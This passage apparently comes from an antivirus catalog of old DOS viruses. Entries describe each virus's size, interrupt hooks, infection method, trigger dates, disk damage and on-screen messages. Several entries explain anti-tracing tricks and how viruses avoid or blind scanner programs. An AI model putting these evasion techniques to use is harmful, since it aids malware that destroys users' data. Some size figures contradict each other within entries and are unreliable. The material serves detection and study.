Loss of data stored in the last 7 sectors of the hard disk;
increased file sizes. File sizes increase by 2926 bytes. Virus
displays the following message:
"I'm the invisible man, I'm the invisible man Incredible how
you can See right through me."
Virus also plays music on the system speaker.
[Junkie]
Virus Name: Junkie
Virus Type: Memory-Resident Multipartite
Virus Length: 512 bytes
Interrupt Vectors Hooked: INT 21h
Infection Process:
Once a virus-infected program is run, the virus installs itself
in the memory as a terminate-and-stay-resident program. On the
system area of the hard disk, the virus copies two 512-byte
sectors of code into the first track of the hard disk. The virus
then modifies the existing master boot record of the hard disk to
read the extra sectors and execute them upon boot-up.
Damage: Virus adds approx. 1,024 bytes of virus code at the end
of infected files.
[March 25th]
Virus Name: March-25th
Virus Type: File Virus (EXE and COM files). The MARCH-25H
virus will infect .COM and .EXE files which are
shorter than 196608 Bytes in length.
Virus Length: 1056 Bytes
Interrupt Vectors Hooked: INT 21h
Infection Process:
This virus is spread by executing an infected program. When a
MARCH-25H infected program is executed, it will check to see if
it is already resident in the memory by checking if address 0:212h
contains the value F100h. If it is already in the memory it will
execute the infected program. Virus stays resident at the top of
the MCB (memory control block) but below the DOS 640k boundary.
The available free memory will decrease by 1056 (420H) bytes.
It will infect .EXE and .COM programs when they are executed from
the hard disk.
Damage:
The virus destroys the hard disk. Infected files will have a file
length increase of 1025 - 1040 (401h - 410h) bytes with the virus being
located at the end of the file.
Symptoms: Virus causes data loss on the C drive.
Note:
If the system date is March 25 of any year, the virus will proceed to
write garbage to:
C drive sector 0 - 6 , cylinder 0 , head 0
C drive sector 1 - 7 , cylinder 1 , head 0
C drive sector 1 - 7 , cylinder 2 , head 0."
[Minosse]
Virus Name: MINOSSE
Virus Type: File Virus (EXE files), MBR
Virus Length: 5772 bytes
PC Vectors Hooked: INT 21h
Infection Process:
MINOSSE is a polymorphic virus which prevents the Debug.exe
program from tracing this virus. When a MINOSSE infected program
is executed, it will;
1. Hook int 8xh - int 9xh: (x:any number) First, it will hook
int 8xh - 9xh, and then it will run this interrupt to get into
virus entry and decrypt the virus body.
2. Stay resident at the top of MCB (memory control block) but
below the 640k DOS boundary.
Damage:
Virus will hang the system when the system date is greater than June
and the day is the 25th. Infected programs will have a file
length increase of 3075 bytes with the virus being located at the
end of the file. The available free memory will decrease by 5772 bytes.
Symptoms: Decreased available memory. Virus will display the
following message,
"Minose 1V5 (c) 93 WilliWonka."
Note:
This virus is a polymorphic and also a very smart virus. It is
not easy to detect using scan programs because it doesn't have
the same code for scanning, and it is not easy to find using the
interrupt vectors because it recovers int 21h to the original vector.
[Mombasa]
Virus Name: MOMBASA
Virus Type: File Virus (COM files)
Virus Length: 3584 bytes
PC Vectors Hooked: INT 21h, INT 08h
Infection Process:
MOMBASA is a polymorphic virus and uses INT 01h and INT 03h to
prevent tracing this virus. When a MOMBASA infected program is
executed, it will; Stay resident at the top of MCB (memory
control block) but below the 640k DOS boundary. The available
free memory will decrease by 3584 bytes. It will hook int
08h to detect if int 21h is changed by another program. If the
INT 21h vector is changed, the virus will change it's vector to
the new INT 21h vector and will hook its vector to int 21h again.
It will infect .COM programs and try to infect C:\COMMAND.COM
when they are executed. When MOMBASA is memory resident it will
hide the file size change because the virus recovers the original
file length. When creating a directory, removing a directory,
or selecting a default drive such as A: or B:, the virus writes some
data onto the disk/diskette, but without success.
Damage:
Screen slowly fades until completely blank. The system then
proceeds to hang. Virus destroys the boot sector and FAT of the hard
drive. Infected programs will have a file length increase of 3568
bytes with the virus being located at the end of the file.
Symptoms: Virus displays the following message:
"I'm gonna die...Attack radical...Mombosa virus (MM 92')."
[NOV-17-768]
Virus Name: NOV-17-768
Virus Type: File Virus (COM files shorter than 59920 Bytes, EXE)
Virus Length: 768 Bytes (file), 800 Bytes (memory)
PC Vectors Hooked: INT 21h
Infection Process: This virus is a variant of the November-17th
virus. The November 17th virus was detected in January, 1992. Its
origin or point of original isolation was originally unknown, but
it has since been reported as being widespread in Rome, Italy,
during the month of December, 1991. November 17th is a memory
resident infector of .COM and .EXE programs, including
COMMAND.COM. The first time a program infected with November 17th
is executed, the virus will install itself memory resident at the
top of the system memory but below the 640K DOS boundary.
Damage:
Virus destroys current disk from sector 1 to sector 8. Total
system and available free memory, as indicated by the DOS CHKDSK
program, will decrease by 896 bytes. Interrupt 12's return will
not have been moved. Interrupts 09 and 21 will be hooked.
Symptoms: Infected programs will have a file length increase of
855 bytes with the virus being located at the end of the infected
file. There will be no visible change to the file's date and time
in a DOS disk directory listing
Note:
[NOV-17-800]
Virus Name: NOV-17-800
Virus Type: File Virus (COM and EXE files), Memory Block
Resident. Virus does not infect "SCAN", "CLEAN."
Virus Length: 800 bytes (file), 832 bytes (memory)
PC Vectors Hooked: INT 09h and 21h
Infection Process:
The first time a program infected with November 17th is executed,
the virus will install itself memory resident at the top of the
system memory but below the 640K DOS boundary.
Damage: Virus destroys the hard disk's FAT. When the value of [00:46E]
is changed and the month = 1, the virus will then write garbage
onto the current disk from sectors 1 to 8.
Symptoms: File sizes increase by 800 bytes. Decreased available
memory by 800 bytes.
[Protovir]
Virus Name: PROTOVIR
Virus Type: File Virus (COM files), resides in HiMem
Virus Length: 730 bytes (file), 270 bytes (memory)
PC Vectors Hooked: INT 21h
Infection Process:
Virus infects .COM programs when they are executed. Infected
files will have a file length increase of 730 bytes with the
virus being located at the end of the file. Virus updates the
first 7 bytes, makes the file head point to the virus code, and
reserves the first 7 bytes at the end of the infected file.
Damage: Increased file sizes. Decreased available memory.
Symptoms: Available free memory will decrease by 720 bytes.
[Red Spider]
Virus Name: RED SPIDER
Virus Type: File Virus
Virus infects .COM files that are between 2,000
(7D0H) and 63,500 (F80CH) bytes in length. Infect
.EXE files that are smaller than 524,288 (80000H)
byte. Virus is a Memory Block Resident.
Virus Length: 949-964 bytes (file)
PC Vectors Hooked: INT 21h
Infection Process:
Virus stays resident at the top of the MCB (memory control block)
but below the DOS 640k boundary. Virus infects .EXE and .COM
programs when they are executed. Infected files will have a file
length increase of 949 - 964 bytes with the virus being located
at the end of the file.
Damage: Increased file sizes. Decreased available memory.
Symptoms: The available free memory decreases by 976 bytes.
Note: If COMMAND.COM is infected, the file length will not
change. This virus will not infect. The following text strings
can be found encrypted in the virus code:
"Red Spider Virus created by Garfield from Zielona Gora in
Feb 1993 ....... "
[Hello Shshtay]
Virus Name: HELLO-SHSHTAY
Virus Type: File Virus
Virus infects .COM files shorter than 63,776 bytes and
.EXE files shorter than 52,428 bytes. Virus is a
Memory Block Resident.
Virus Length: 1,840-1,855 bytes (EXE), 1,600-1615 bytes (COM),
1792 bytes (memory)
PC Vectors Hooked: INT 21h
Infection Process:
Virus stays resident at the top of the MCB (memory control block)
but below the DOS 640k boundary. The available free memory
decreases by 1792 bytes. Virus infects .EXE and .COM programs
when they are executed. Infected .EXE files will have a file
length increase of 1840-1855 bytes and infected .COM files will
have a file length increase of 1600-1615 bytes with the virus
being located at the end of the file in both cases.
Damage: Increased file sizes. Decreased available memory.
Symptoms: Virus displays the following messages:
"HELLO SHSHTAY"
"GODBYE AMIN "
"HELLO SHSHTAY"
" ZAGAZIG UNIV"
Note: If the system date is greater than or equal to January,
1994, it will hook INT 1Ch, INT 09h and set a counter = 0.
Interrupt 1ch will add one to the counter 18.2 times every second
and when the counter is greater than or equal to 3786 (ECAh) it
will trigger INT 09h and reset the counter back to 0. When
Interrupt 09h is activated, it will put a message into the
keyboard buffer, so around every 208 (3786/18.2) seconds, the
screen will display one message in turn from the above list.
[Star Dot]
Virus Name: STARDOT
Virus Type: File Virus (EXE files)
Virus Length: 592-608 bytes (file)
PC Vectors Hooked: INT 21h
Infection Process:
Virus only infects .EXE programs when they are executed. There
will be a file length increase of 592 - 608 bytes with the virus
being located at the end of the file. When the virus infects
another clean program, it adds a counter and writes the value and
virus body into a clean program, so the virus will get the day of
the week and compare with the lowest 3 bits of the counter. If
the values are equal, it will randomly destroy the current disk
sector 8 times. If the counter value is equal to 63 (3Fh), it
will send the random data to the system I/O port (from 380h to 3DFh).
Damage: Virus destroys current disk sector and sends random data
to the system I/O port.
Symptoms: Data loss on the disk and increased file sizes.
[Stunning Blow]
Virus Name: STUNNING BLOW
Virus Type: File Virus
Virus infects .EXE files not starting with the following
letters: "TB","F-","CP","NA","SC","CL","V." Virus is a
Memory Block Resident.
Virus Length: 1237 bytes (file), 1392 bytes (memory)
PC Vectors Hooked: INT 21h
Infection Process:
This virus will activate on the 4, 8, 12, 16, 20, 24, and 28 of
each month, after the initial delay period of one month. Upon
activation the virus will:
(1) Hook interrupt 08h, counter = FFD0h
(2) Decrease the counter by 18.2 every second, and
(3) When the counter reaches zero it will start to play music on
the speaker. This virus also activates when a random seed =
-1, and it will display the following message:
" Stunning Blow (R) Ghost Player Italy."
Damage: Virus deletes *.CPS files.
Symptoms: Loss of some files named *.CPS and increased file
sizes. Decreased available memory.
[Sunrise]
Virus Name: SUNRISE
Virus Type: File Virus (EXE files)
Virus Length: 1033 bytes (file), 80 bytes (memory)
PC Vectors Hooked: INT 21h
Infection Process:
From the root directory of the current disk, the virus searches for
the last subdirectory then changes to that subdirectory and all
subsequent last subdirectories. The virus then searches to infect an
uninfected *.EXE file. The virus checks the disk serial number. If the
number is equal to zero and one memory word is equal to 2Dh, it will
display the following message:
"* Sun Rise * EpidemicWare G.I.P.Po oct-93."
Interrupt 08h will be hooked: If the month when the executed file
was infected is not equal to the current month, the virus will
hook int 08h, which will:
(i) Be resident at the top of the memory but below the 640k
boundary.
(ii) Decrease available memory by 80 bytes.
(iii) Assign a value of BDD8h to a counter and decrease the counter
by 18.2 every second. When the counter reaches zero the
screen will blank out and the original screen contents will
then scroll up. After this, the system returns to normal
operation.
(iv) Assign a value of 1518h to the counter and repeat steps (ii),
(iii) and (iv).
Damage: Virus hooks int 8h and at certain intervals the screen
goes blank and scrolls up.
Symptoms: Increased file sizes. Decreased available memory.
[Thule]
Virus Name: THULE
Virus Type: File Virus
Virus infects .COM files shorter than 61,054 bytes.
Virus is a Memory Block Resident.
Virus Length: 309 (COM files), 68 bytes (memory)
PC Vectors Hooked: INT 21h
Infection Process:
This virus will move the virus code to 0:200h-0:243h and hook int 21h
in order to delete a file named "THULE.COM." When DOS changes
the current directory, it will try to open "THULE.COM" on the
current directory. When found, this file will be deleted.
Damage: The file named "THULE.COM" will be deleted.
Symptoms: Increased file sizes. A file is deleted.
[Topa 1.20]
Virus Name: TOPA 1.20
Virus Type: File Virus
Virus infects .COM files between 2712 and 60000
bytes. Infects .EXE files between 5424 and 524288
bytes. Virus is a Memory Block Resident.
Virus Length: 2456-2471 bytes (EXE files), 2456 bytes (COM files),
5536 bytes (memory)
PC Vectors Hooked: INT 1Ch, INT 21h
Infection Process:
This virus is spread by executing an infected program. When a
TOPA_1.2 infected program is executed, it will check to see if
AX= 4290h, INT 21 and return AX = 9047 indicate it is already
resident in the memory. If it is, the virus will execute the
infected program. If not, the virus will perform the following:
1) It will change memory allocate strategy to low memory last
fit, then stay resident at the MCB (memory control block). The
available free memory will decrease by 5536 (15A0H) bytes.
2) Once the TOPA_1.2 virus is memory resident, it will hook int
1Ch and int 21h in order to infect files.
Damage: Decreased available memory.
Symptoms: Increased file sizes.
[Topo]
Virus Name: TOPO
Virus Type: File Virus
Virus infects .EXE files shorter than 524288 bytes.
Virus is a Memory Block Resident.
Virus Length: 1536-1552 bytes (file), 3616 bytes (memory)
PC Vectors Hooked: INT 21h
Infection Process:
This virus is spread by executing an infected program. When a
TOPO infected program is executed, first it will hook INT 3 then
use this interrupt to deceive the virus body. The virus will
then check to see if it is already resident in the memory by
checking if address 0:3feh contains the value 0011h. If the virus
is already in the memory it will execute the infected program. The
virus will not include files named: *AN.EXE and *LD.EXE, with "*"
being a wild card.
Damage: Virus destroys the diskette parameter (00:525h - 0:52Ch) and
displays the following message:
"R(etry), I(gnore), F(ail), or A(bort) ?"
Symptoms: Increased file sizes and the inability to read certain
files. Decreased available memory.
Note: If the system date is equal to 25 or 26 of any month,
the above message will appear.
[Bloody Warrior]
Virus Name: BLOODY-WARRIOR
Virus Type: Resident at the top of the MCB
(memory control block)
Virus Length: 1344 bytes (file), 2768 bytes (memory)
PC Vectors Hooked:
Execution Procedure:
The virus infects COM and EXE files as long as the COM file is
smaller than EA60h bytes. It will not infect the following
files: "SCAN", "STOP", "SHIELD", "CLEAN", "CV", "DEBUG", "TD."
This virus can only spread by executing an infected program.
Damage:
The virus destroys the disk sector from sector 1 to 256. By progressive
action: it will write garbage to the current disk from sectors 1
to 256 when it is the fourth or later in the month of July.
Detection method:
Infected files increase by 1344 bytes.
Symptoms:
When a BLOODY-WARRIOR infected program is executed it will be:
1. Resident at the top of the system memory but below the 640k DOS
boundary. The available free memory will decrease by 2768 bytes.
2. Interrupt 21h will be hooked: When the BLOODY-WARRIOR virus is
memory resident, in order to infect the files the virus will
control the following functions:
- loading and executing (AX=4B00h)
- opening (AH=3Dh)
- get and set file attribute (AH=43h)
- rename a file (AH = 56h)
It will infect EXE and COM files when they are executed, opened,
when getting file attributes, or when renaming files. But it
will not infect COM files if the length is greater than EA60h
bytes. Infected programs will have a file length increase of
1344 bytes with the virus being located at the end of the
file. If file header is : "SCAN","STOP", "SHIELD", "CLEAN",
"CV", "DEBUG", or "TD" the virus will not infect these files
but will instead restore int 21h to the original interrupt
vector so these files will not be able to detect the virus.
3. This virus will only activate in July, when the date is the
4th or later. It will write garbage to the current disk from
sectors 1 to 256. The garbage data includes the follow message"
"Hello, world!
I am the Bloody Warrior.
Nice to meet you.
What about this virus ? Funny ?
There is no hope for you.
This virus was released in Milan
1993."
Note: There is a possibility of detection when using DOS commands.
[17690]
Virus Name: 17690
Virus Type: File Virus (EXE files)
Virus Length: 17,690 bytes
Execution Procedure:
1) There is a 10% chance that the virus will infect a file. The
method of infection is: virus searches for an EXE file on
diskette A. Then renames this file and creates a new COM file
with the same name as the original EXE file. This new COM
file is the virus.
2) When the virus does not infect files, it will execute the program
that has been renamed. User will not see any unusual
manifestation.
Damage: None
Detection method: Infected files increase by 17,690 bytes.
[Fish 1100]
Virus Name: Fish-1100
Virus Type: File Virus (COM files)
Virus Length: 1100 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 1100 bytes.
[Fish 2420]
Virus Name: Fish-2420
Virus Type: File Virus (COM files)
Virus Length: 2420 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 2420 bytes.
[Small 178]
Virus Name: Small-178
Virus Type: File Virus (COM files)
Virus Length: 178 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Note: An error message appears when writing because INT 24h has not
been hanged.
Detection method: Infected files increase by 178 bytes.
[Shiny-Happy]
Virus Name: Shiny-Happy
Virus Type: File Virus (EXE files)
Virus Length: 921 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
executed is an uninfected EXE file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 921 bytes.
[Sucker]
Virus Name: Sucker
Virus Type: File Virus (EXE files)
Virus Length: 572 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected EXE file, the virus proceeds to infect it.
Damage: None
Note:
1) An error message appears when writing because INT 24h has not been
hanged.
2) This virus can be cleared with Soft-Mice. Virus will make a
mistake in clearing SUCKER.CO..
Detection method: Infected files increase by 572 bytes.
[Data-Rape-2.0]
Virus Name: Data-Rape-2.0
Virus Type: File Virus (COM and EXE files)
Virus Length: 1875-1890 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM or EXE file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 1875-1890 bytes.
[Flagyll]
Virus Name: Flagyll
Virus Type: File Virus (EXE files)
Virus Length:
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected EXE file, the virus proceeds to infect it.
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
Note: An error message appears when writing because INT 24h has not
been hanged.
[X-3B]
Virus Name: X-3B
Virus Type: File Virus (COM and EXE files)
Virus Length: 1060 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM or EXE file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 1060 bytes.
[Math-Test]
Virus Name: Math-Test
Virus Type: File Virus (COM and EXE files)
Virus Length: 1136 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM or EXE file, the virus proceeds to infect it.
Damage: None
Note: An error message appears when writing because INT 24h has not
been hanged.
Detection method: Infected files increase by 1136 bytes.
[Not-586]
Virus Name: Not-586
Virus Type: File Virus (COM files)
Virus Length: 586 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 586 bytes.
[Xoana]
Virus Name: Xoana
Virus Type: File Virus (EXE files)
Virus Length: 1670 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected EXE file, the virus proceeds to infect it.
Damage: None
Note: An error message appears when writing because INT 24h has not
been hanged.
Detection method: Infected files increase by 1670 bytes.
[Pit-1228]
Virus Name: Pit-1228
Virus Type: File Virus (COM and EXE files)
Virus Length: 1228 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds to
infect it.
Damage: None
Detection method: Infected files increase by 1228 bytes.
[Finnish-357]
Virus Name: Finnish-357
Virus Type: File Virus (COM files)
Virus Length: 709 BYTES
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and checks whether COMMAND.COM that booted up the
system is infected. If not, the virus infects it and goes back to
the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
Detection method: Infected files increase by 709 bytes.
[TU-482]
Virus Name: Tu-482
Virus Type: File Virus (COM files)
Virus Length: 482 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Note:
1) An error message appears when writing because INT 24h has not been
hanged.
2) When the virus is executed, it jumps to the end of the program, then
jumps back to the beginning making it difficult to locate.
Detection method: Infected files increase by 482 bytes.
[Uruk-Hai]
Virus Name: Uruk-Hai
Virus Type: File Virus (COM files)
Virus Length: 394 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 394 bytes.
[V-388]
Virus Name: V-388
Virus Type: File Virus (COM files)
Virus Length: 394 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file that ends with INT 21(AH=4Ch),
the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 394 bytes.
[Wizard 3.0]
Virus Name: Wizard-3.0
Virus Type: File Virus (COM files)
Virus Length: 268 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Note: An error message appears when writing because INT 24h has not
been hanged.
Detection method: Infected files increase by 268 bytes.
[Semtex]
Virus Name: Semtex
Virus Type: File Virus (COM files)
Virus Length: 1000 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and INT 8h, then goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Note:
1) An error message appears when writing because INT 24h has not been
hanged.
2) At the beginning of an infected file, the following can be found:
MOV BP,XXXX
JMP BP
Detection method: Infected files increase by 1000 bytes.
[1720]
Virus Name: 1720
Virus Type: File Virus (COM files)
Virus Length: 1723 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 1723 bytes.
[Number 6]
Virus Name: Number6
Virus Type: File Virus (COM files)
Virus Length: 631 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 631 bytes.
[Timemark]
Virus Name: Timemark
Virus Type: File Virus (EXE files)
Virus Length: 1060-1080 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected EXE file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 1060-1080 bytes.
[Sergant]
Virus Name: Sergant
Virus Type: File Virus (COM files)
Virus Length: 108 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Note: An error message appears when writing because INT 24h has not
been hanged.
Detection method: Infected files increase by 108 bytes.
[Penza]
Virus Name: Penza
Virus Type: File Virus (COM files)
Virus Length: 700 bytes
PC vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 700 bytes.
[Nines]
Virus Name: Nines
Virus Type: File Virus (COM files)
Virus Length: 706 or 776 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Note: An error message appears when writing because INT 24h has not
been hanged.
Detection method: Infected files increase by 706 or 776 bytes.
[Seacat]
Virus Name: Seacat
Virus Type: File Virus (COM files)
Virus Length: 1600 bytes
Execution Procedure:
The virus searches for an uninfected COM file on the current directory,
then infects it (only infects one file at a time).
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 1600 bytes.
[Wake]
Virus Name: Wake
Virus Type: File Virus (EXE files)
Virus Length:
Execution Procedure:
The virus searches for all uninfected EXE files on the current
directory, then infects them (only infects one file at a time).
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
[T-1000-B]
Virus Name: T-1000-B
Virus Type: File Virus (COM files)
Virus Length:
Execution Procedure:
The virus searches for all uninfected COM files on the current
directory, then infects them (only infects one file at a time).
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
[Soupy]
Virus Name: Soupy
Virus Type: FIle Virus (COM files)
Virus Length: 1072 bytes
Execution Procedure:
The virus searches for an uninfected COM file on the current directory,
then infects it (only infects one file at a time).
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 1072 bytes.
[Small-Exe]
Virus Name: Small-Exe
Virus Type: File Virus (EXE files)
Virus Length: 349 bytes
Execution Procedure:
The virus searches for an uninfected EXE file on the current directory,
then infects it (only infects one file at a time). After infection, the
virus halts the system.
Damage: The virus halts the system every time it infects a file.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 349 bytes.
[Toys]
Virus Name: Toys
Virus Type: File Virus (COM and EXE files)
Virus Length: 773 bytes
Execution Procedure:
The virus searches for uninfected COM and EXE files on the current
directory, then infects them (infects two files at a time).
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 773 bytes.
[Leper]
Virus Name: Leper
Virus Type: File Virus (COM and EXE files)
Virus Length:
Execution Procedure:
The virus searches for uninfected COM and EXE files on the current
directory, then infects them (infects four files at a time).
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
[Arcv-7]
Virus Name: Arcv-7
Virus Type: File Virus (EXE files)
Virus Length: 541 bytes
Execution Procedure:
The virus searches for an uninfected EXE file on the current directory,
then infects it (only infects one file at a time).
Damage: None
Note:
1) Because the virus infection program is not well written, the
system will halt when an infected program is executed.
2) It does not stay resident in the memory.
3) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 541 bytes.
[Arcv-6]
Virus Name: Arcv-6
Virus Type: File Virus (COM files)
Virus Length: 335 bytes
Execution Procedure:
The virus searches for an uninfected COM file on the current directory,
then infects it (only infects one file at a time).
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 335 bytes.
[Arcv-5]
Virus Name: Arcv-5
Virus Type: File Virus (COM files)
Virus Length: 475 bytes
Execution Procedure:
The virus searches for an uninfected COM file on the current directory,
then infects it (only infects one file at a time).
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 475 bytes.
[Exper-416]
Virus Name: Exper-416
Virus Type: File Virus (COM files)
Virus Length: 416 bytes
Execution Procedure:
The virus searches for all uninfected COM files on the current
directory, then infects them.
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
